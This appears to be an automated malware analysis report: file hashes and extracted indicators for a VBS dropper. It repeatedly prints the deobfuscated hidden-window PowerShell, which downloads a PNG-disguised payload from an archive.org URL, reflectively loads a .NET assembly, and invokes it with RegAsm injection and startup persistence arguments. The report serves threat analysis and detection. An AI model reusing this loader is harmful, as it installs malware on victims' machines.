|
Hash | Hash Value |
|---|---|
| MD5 | a6136083edffb2613f3854faba2e3a42
|
| Sha1 | b39243e587cd86d0157a2c0d3dedd9ac12a055a0
|
| Sha256 | b7abe8b32dbd89131ca036bd0a9ea1f4040a187322a1e8f8abc9b2f7c912a1f8
|
| Sha384 | 172283a3af612398cbf8ca95cbb1eb00c636111e9c8f771421b6fe394ccbf0265544c36800fab5bd5bcdcd4cc13778b1
|
| Sha512 | aa24aa3c3f41f2d52db774ff04f5c253c94bd96b900e6f1e9bf110b453f3e2fbf95d9755ed83cf542905287152cc641eb0df8f4434cbe79fb306be2a02924d22
|
| SSDeep | 24576:BlmZPKMDLdgBEjdSxDTEdLlmZPKMDLdgBEjdSxDTEdplmZPKMDLdgBEjdSxDTEdJ:BjeSgdjeSgvjeSgL
|
| TLSH | 59D5E1DFB90D16C8888632FA69159592F1CE83D13305CBB2ED74C79472998B8E92F7C1
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
a6136083edffb2613f3854faba2e3a42 |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" Malicious |
a6136083edffb2613f3854faba2e3a42 > a6136083edffb2613f3854faba2e3a42.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" Malicious |
a6136083edffb2613f3854faba2e3a42 > a6136083edffb2613f3854faba2e3a42.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
a6136083edffb2613f3854faba2e3a42 > a6136083edffb2613f3854faba2e3a42.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
a6136083edffb2613f3854faba2e3a42 > a6136083edffb2613f3854faba2e3a42.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
a6136083edffb2613f3854faba2e3a42 > a6136083edffb2613f3854faba2e3a42.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
a6136083edffb2613f3854faba2e3a42 > a6136083edffb2613f3854faba2e3a42.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
a6136083edffb2613f3854faba2e3a42 > a6136083edffb2613f3854faba2e3a42.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |